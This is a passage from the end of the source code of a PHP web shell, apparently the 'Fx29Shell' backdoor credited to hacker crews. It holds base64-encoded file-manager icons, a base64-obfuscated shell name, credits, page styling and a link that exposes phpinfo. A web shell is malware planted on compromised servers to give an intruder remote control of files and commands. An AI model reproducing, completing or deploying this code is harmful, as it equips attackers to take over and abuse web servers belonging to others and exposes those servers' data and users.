3208'AAAAACH5BAHoAwkALAAAAAAYABgAAASwMMlJq7046zSM/8YmeYNgFiZiHMdmCEVszoIaXscLpwhC'.
3209'dy2LASETlAoBXw8xCFYMqNQuWesBK4OjkVgYLL8B52h2LCCS2WxgECAAJiteLNarMtduOEE678/P'.
3210'bW8jBzVefigybIEUQz0BMF0EAZOTkm6CEgCNbFOUngR5FAdLazCAlKChomt3ASiolpiMB5OKbJZt'.
3211'oLIVtJ6VuaoXAAepxbq7GcTFAMgbzM/NItLTGxEAOw==',
3212 "forward"=>
3213'R0lGODlhGAAYAKIGAB9fHVu2T7nirIbKdjaXL+z36P///wAAACH5BAHoAwYALAAAAAAYABgAAAOc'.
3214'aLrc/g1ICSsZIosRSGWXUGjaQAAfIY7Z4GIc+qgFy734+Qxsy2+BV8dBGPVeI04wEJAtfiSgSMCs'.
3215'Og2AEu5Wo1Z1iuwGsymvChxCxynG1N7wWocAxmaCGVZcQKezYVVfPCNzJ1cBYzdMF4R9dWEwQkFy'.
3216'hY8KF5KIaI6WYUGKS5ydYReBapxXDgBqpn0UH2Grjq+wDBMTtbm6uwsJADs=',
3217 "up"=>
3218'R0lGODlhGAAXAKIGABxXG0irPrLeo3zFbzWFMOLz3v///wAAACH5BAHoAwYALAAAAAAYABcAAAOP'.
3219'aLrc/jBKMoa4lRCp6C1XOASbNBQgVq1D6XipsAYs+RCoAFZ5QNMEQIOSq+hQO59PyAjoMEckauQL'.
3220'MnBQaS5JYnZ2Tx6INu5ed5bRqUClmhcEEU3srlrhIZlsXSe8OxZ6K1NKJAFecIEshFV/CwBONRiN'.
3221'dy9zFYVKGohDlz92AJw3mSRBohGhqaEcrK2uDgkAOw==',
3222 "help"=>
3223'R0lGODlhGAAYAKIGADlqzKjA6O3x932d3rPk/12Byv///wAAACH5BAHoAwYALAAAAAAYABgAAAOa'.
3224'aLor7ixK8+qb0eqLN/mENVlfYJpDUEkPMaSh474xwbTvsA3AEN8CV6GgEhR6Dh5SEFA8BkeASgmQ'.
3225'Aa4/igMQvXoLjoBXJ3AGu95rMQ0ua8Vpb5HKhWgJ8SsZfbVb8ypwaWRmRoACdHp2Wol5aTINW3Ep'.
3226'fHtAgn1MbByRmnKIXw8FLE9fV0ScEkVhKSYrGAqrG02wEa6stbm6CQA7',
3227
3228 "change"=>
3229'R0lGODlhEAAQALMMADMuME2f58e2ON7OMsXZ88wpTd/t/FhYU4x9erCwrIWSpW54iwAAAAAAAAAA'.
3230'AAAAACH5BAHoAwwALAAAAAAQABAAAARckMlJ6wQn6wMsW0QoBktXLUaaEkHAIYiJqiuhFAUg0yqR'.
3231'IAKdZMYzIAacCbGXEAyEQ0IvlEAeKCCDVJpompRbkUJzEokBi0XZTFgoCFfKwa1Q0NNxCmazz3v+'.
3232'DBEAOw==',
3233 "delete"=>
3234'R0lGODlhEAAQAKIGAJIMJNMHLckjQURDQ2oqNigoKAAAAAAAACH5BAHoAwYALAAAAAAQABAAAANP'.
3235'KDHW/k4JBiuRFI5pilBE8RQX12yBIHYfMGTeNxQoMVfbJ7gZ5AWpV8VBU6SGkVSpR7zwdISKURgz'.
3236'dS4B2yMXMgyAWo2OBGQ6cq+NmbhJAAA7',
3237 "download"=>
3238 "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
3239 "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
3240 "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
3241 "setup"=>
3242 "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
3243 "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3244 "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
3245 "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
3246 "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
3247 "small_dir"=>
3248'R0lGODlhDwAQALMPAAkJCXV3iEFvz5it4MXV8lFkqXaU2au+6EtMViQkJYGGq2JjcUFhunN3ljc3'.
3249'OQAAACH5BAHoAw8ALAAAAAAPABAAAARuEKDVVEsv64wO+UfjOBO1AM2nHsbQGkaDDCo43EdOVPW9'.
3250'ErmFgjDI6YyHm7AINN5cMESgSH3CBAKGo9GCwgxYrHbx/YbDYwEYfEY7Fu149s2QZxkFRQJRR+Mb'.
3251'AQsOAA98DH8NggCEGgmAiowbGREAOw==',
3252 "small_unk"=>
3253'R0lGODlhEAAQAKIHABpFnoap3bTL89vq/FuCvVZlhH6Ms////yH5BAHoAwcALAAAAAAQABAAAANL'.
3254'eBfcrVCFQetgJS5bA/nRxFlGJlUFoBICZUDi6gGsYG5DWqntLZI8G4xDCApPHeMR5wL8lgbSE9rq'.
3255'OavUqurngTm+ntuhQC6byYcEADs=',
3256 "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
3257 "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
3258 "sort_asc"=>
3259 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
3260 "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
3261 "sort_desc"=>
3262 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
3263 "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
3264 "ext_asp"=>
3265 "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
3266 "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
3267 "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
3268 "ext_mp3"=>
3269'R0lGODlhEAARALMPADE8XE6ekMSuNMDW7M1IRGRoZOXs9Ki31Y2HW3PEiFl2u19RX4ajzNmCeuew'.
3270'pwAAACH5BAHoAw8ALAAAAAAQABEAAASI8D1Gqy0yM8O7GRSmeR2oKOJEcgN4oJJyNExSD197iAjS'.
3271'OI2EkIFrYQqN3+cgRBA/iwLhh+MwE4HDYLeYGg4MLTNQCBi7joECcKKQC9tCV7tmhwoALV5BPMnA'.
3272'PXk7BSc5LA4CCAUHXCcHHogChIwYbG2RkgVhOxKWCggCkgCafCkAp6inBaurEQA7',
3273 "ext_avi"=>
3274'R0lGODlhEAAQALMMAAUFBY2OkM7T2UpKSqWoq+zz/GhoaSQkJLW4u1paWnp6ejY3NwAAAAAAAAAA'.
3275'AAAAACH5BAHoAwwALAAAAAAQABAAAARdkMkpgVGH6poIwttkeQUBbqNQrGZGjYG6lobLWAoixHOw'.
3276'GByDbpUrAQ6K2+AoW/0OyOMy4GtioozBgsAaqBDa08AwoxHCgMmPRzSM05R17x2SBxKn+uUCD0nW'.
3277'fRoRADs=',
3278 "ext_cgi"=>
3279'R0lGODlhEAAQAKIHAEhJS+q8D/7dNfnulpR/U5pqCtS5eP///yH5BAHoAwcALAAAAAAQABAAAANT'.
3280'eLpX/K9ISItwlElBcG5BMEFSGYolVgzsYAih0Q5FF7IwjAcdcRCE021wKQB8CqCQRQAcH4SXYOck'.
3281'EQUy2DMSMmaBEWITSBAjFZLxAliDghlkRQIAOw==',
3282 "ext_cmd"=>
3283 "R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI".
3284 "eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN".
3285 "dmrYAMn1onq/YKpjvEgAADs=",
3286 "ext_cpp"=>
3287 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC".
3288 "WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra".
3289 "Eq7YrLDE7a4SADs=",
3290 "ext_ini"=>
3291 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL".
3292 "aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM".
3293 "SnEjgPVarHEHgrB43JvszsQEADs=",
3294 "ext_diz"=>
3295'R0lGODlhEAAQAKIHAAsZcWyPv7vT6eb0/ThOi1tukZyyy////yH5BAHoAwcALAAAAAAQABAAAANS'.
3296'eHrTLiu6IYh5chZAJlRTI4RDcIyacXkF6gAcWaxPLFJzaNhoZYyoXQcoCMwErgCHuFP8kEVjAGkg'.
3297'FBaqJ9CgvEYOBQK06/0qjlazuSBVr8uLBAA7',
3298 "ext_doc"=>
3299 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR".
3300 "WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq".
3301 "MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=",
3302 "ext_exe"=>
3303 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
3304 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
3305 "xhIAOw==",
3306 "ext_h"=>
3307 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB".
3308 "WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo".
3309 "Wq/NknbbSgAAOw==",
3310 "ext_hpp"=>
3311 "R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF".
3312 "WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR".
3313 "UqUagnbLdZa+YFcCADs=",
3314 "ext_htaccess"=>
3315 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6".
3316 "WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ".
3317 "AAA7",
3318 "ext_html"=>
3319'R0lGODlhEAAQALMOAIyt016Itv///2Gp4uXy/c3P/MXl/mtrnC6Z4mfd/Chgk7PO9lBVhnNzc///'.
3320'/wAAACH5BAHoAw4ALAAAAAAQABAAAASF0EkHqq1h6nuzloAgjkIwfJRIFJVxFMgHDGYQCMihe46d'.
3321'/IiBIEEQFA4SkwHBZAaKK2RPAFAACM0nwTUFMAeD5mFBWCCpTIV6rSCbKQkFQpEw2A1lw4LRa84X'.
3322'cn96fAg4gQgJAwwAensOAyFzCgyTAAsFgxKQAywVBZcGn3wTDKWlDaamEQA7',
3323 "ext_jpg"=>
3324'R0lGODlhDgAQALMMACYlIC6NFLOxKnqIcbPIikWoIkVFRWllROLZUmO8NqKmoBBxCAAAAAAAAAAA'.
3325'AAAAACH5BAHoAwwALAAAAAAOABAAAARbMKxJ6zw2iGQHFSACCpQ3CWJISmaBCsABcouJiECOIkVg'.
3326'7gadiBXoAXc9X/LGRBASvUEPmiA4qUXpFPpMZrHQojchJZjDVOpgoGib3+82W8Gu0+nrGD2Y4wcN'.
3327'EQA7',
3328 "ext_js"=>
3329'R0lGODlhDwAQAKIEAB4eHZ6eaOLih2BgWQAAAAAAAAAAAAAAACH5BAHoAwQALAAAAAAPABAAAANP'.
3330'SAoR8nAARcZ4rQkr68VCI1nTB4Vj0H1iALzwpIUY3FXOKb4UwYSqDODmY+ROREtmkEFNhqKRyfV7'.
3331'SFzHEQR62qSAnBxJoVSlxhRJLEZJAAA7',
3332 "ext_lnk"=>
3333'R0lGODlhEAAQAKIHAAAFACOPE2TNNj60IQRKAojuVgdlBAAAACH5BAHoAwcALAAAAAAQABAAAANO'.
3334'eGfcbkCpQOu4AkZlLM5AKHlCqW3TVw4hmqqlKB3UKhQF6AZ2ibM7Ew+Xk6UIoQAROAsgQ4RbIWBc'.
3335'tBbSq0RruD1dB1S3BZ5ZteYZ2ZwAADs=',
3336 "ext_log"=>
3337 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA".
3338 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN".
3339 "zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==",
3340 "ext_php"=>
3341'R0lGODlhEAAQAIABAP///////yH5BAHoAwEALAAAAAAQABAAAAIohI8Jwe0Po5wNsRWWxbl3blSe'.
3342'VmHmMWZouj2md7kxB8cfhec6pPRHAQA7',
3343 "ext_pl"=>
3344 "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo".
3345 "GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7",
3346 "ext_swf"=>
3347 "R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O".
3348 "nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
3349 "ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA".
3350 "GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC".
3351 "NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=",
3352 "ext_tar"=>
3353'R0lGODlhEAAQAKIFABokHymwoKiYkKIYbdzo4wAAAAAAAAAAACH5BAHoAwUALAAAAAAQABAAAAM4'.
3354'CLrcJVCMSesAJJOhY7waAUgWhWljo67rE7FMGGhzYNtnNt48HsJAlgsSzIlovYAxlfShBMVoIQEA'.
3355'Ow==',
3356 "ext_txt"=>
3357'R0lGODlhCwAQAKIFACoqKqCeoO/z83d2brO2vwAAAAAAAAAAACH5BAHoAwUALAAAAAALABAAAAM5'.
3358'CLM8MSBIJwNZJAhNRBdDR3xCCYqkGXppuZrwuVWj21mVJo+jZG812Cv288VWD+KQtQA4m4CCdJoA'.
3359'ADs=',
3360 "ext_wri"=>
3361 "R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
3362 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
3363 "a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
3364 "ext_xml"=>
3365 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
3366 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
3367 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
3368 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
3369 "IQA7"
3370 );
3371 return $images;
3372}
3373function sh_name() { return base64_decode("RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=").sh_ver; }
3374function fx29sh_tools() {
3375 echo "<div class=\"barheader\">.: TooLz :.</div>";
3376}
3377function fx29sh_about() {
3378 echo "<div class=\"barheader\">.: Credits :.</div>".
3379 "Idea, leader & coder: <b>tristram [CCTeaM]</b><br>".
3380 "Beta-tester & tips: <b>NukLeoN [AnTiSh@Re tEaM]</b><br>".
3381 "Re-coder, Designer, Windows Fix, PHP Mailer & PHP Filesystem: <b>kaMtiEz [KiLL-9 Crew]</b><br>".
3382 "<br>".
3383 "Please report bugs to <a href=\"mailto:rio_rizaldy@yahoo.com\">FaTaLisTiCz_Fx</a></b>\n";
3384}
3385function html_style() {
3386$style = '<html>
3387<head>
3388 <style>
3389 table {width: 100%;border-collapse: collapse;}
3390 #main, #maininfo {width: 900px;}
3391 body, table, input, select, option, .info
3392 {
3393 font: 8pt tahoma;
3394 }
3395 .footer {font: 7pt tahoma;}
3396 textarea, .code
3397 {
3398 font: 8pt Courier New;
3399 color: #dedbde;
3400 border: 1px solid #666666;
3401 }
3402 img {border: 0;}
3403 #maininfo img {width: 16;height: 16;}
3404 input, select, option {border: 1px solid #606060;}
3405 #maininfo, td, th {border: 1px solid #3F3F3F;}
3406 a {color: #5B5BFF;text-decoration: none;}
3407 #pagebar a, .barheader a {color: #00FF00;}
3408 a:hover, #pagebar a:hover {color: #3366FF;}
3409 .on {color: #00FF00;}
3410 .off, .errmsg {color: #FF0000;}
3411 body, table, input, select, option {color : #EEEEEE;}
3412 .info th {color: #969696;width: 13%;}
3413 .shell {font-size: 12;color: #C0C0C0;border: 0;}
3414 #pagebar a, .barheader, .errmsg, .on, .off
3415 {
3416 font-weight: bold;
3417 }
3418 p, form, .info, .info td, .info th, .explorer *
3419 {
3420 margin: 0;
3421 }
3422 input, #maininfo {margin: 3px;}
3423 #mainpanel input, #mainpanel select
3424 {
3425 margin: 0px 2px 0px 2px;
3426 }
3427 #maininfo table, select {margin: 2px 0px 2px 0px;}
3428 #pagebar, .bartitle, #mainpanel {background: #474747;}
3429 body, textarea, .shell, input, select, option
3430 {
3431 background: #000000;
3432 }
3433 .info, .info th, .info td, input[type="label"]
3434 {
3435 background: transparent;
3436 border: 0;
3437 }
3438 #pagebar td, #mainpanel td, #mainpanel th, .contents th, .explorer td
3439 {
3440 border-left: 0;
3441 border-right: 0;
3442 }
3443 .bartitle, .barheader, input[type="submit"], input[type="button"], input[type="reset"]
3444 {
3445 color: #D0D0D0;
3446 background: #3F3F3F;
3447 border: 1px solid #202020;
3448 border-top: 1px solid #505050;
3449 border-left: 1px solid #505050;
3450 }
3451 input[type="submit"]:hover, input[type="button"]:hover, input[type="reset"]:hover
3452 {
3453 color: #00FF00;
3454 background: #333333;
3455 }
3456 td, .info th {vertical-align: top;}
3457 .explorer td {vertical-align: middle;}
3458 .fleft {float: left;}
3459 .fright {float: right;}
3460 .code, .fleft, .info th {text-align: left;}
3461 .fright, input[type="label"], #mainpanel th, .contents th
3462 {
3463 text-align: right;
3464 }
3465 #maininfo, .bartitle, .quicklaunch, .quicklaunch a, .barheader, th
3466 {
3467 text-align: center;
3468 }
3469 td, textarea, input[type="text"], .bartitle, .barheader, .code, th
3470 {
3471 padding: 3px;
3472 }
3473 .info th, .info td {padding: 0px 2px 0px 2px;}
3474 .quicklaunch a {padding : 0px 5px 0px 5px;}
3475 </style>
3476
3477 <title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
3478
3479</head>
3480
3481<body><center>
3482
3483';
3484return $style;
3485};
3486function html_header() { return "<b>".sh_name()."</b><br>.: a little piece of heaven :."; }
3487function html_footer() { return "© 2008 By kaMtiEz, KiLL-9 CreW. Generated: ".round(getmicrotime()-starttime,4)." seconds"; }
3488function disp_error($msg) { echo "<div class=errmsg>$msg</div>\n"; }
3489function srv_info($title,$contents) { echo "\t\t\t<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n"; }
3490function srv_software($surl) {
3491 $srv_software = getenv("SERVER_SOFTWARE");
3492 if (!ereg("PHP/".phpversion(),$srv_software)) { $srv_software .= ". PHP/".phpversion(); }
3493 return str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\">PHP/".phpversion()."</a>",htmlspecialchars($srv_software));
3494}
3495
3496########################
3497##[ END OF FUNCTIONS ]##
3498########################
3499chdir($lastdir); fx29shexit();
3500##########################
3501##[ FeeLCoMz Community ]##
3502##########################
3503?>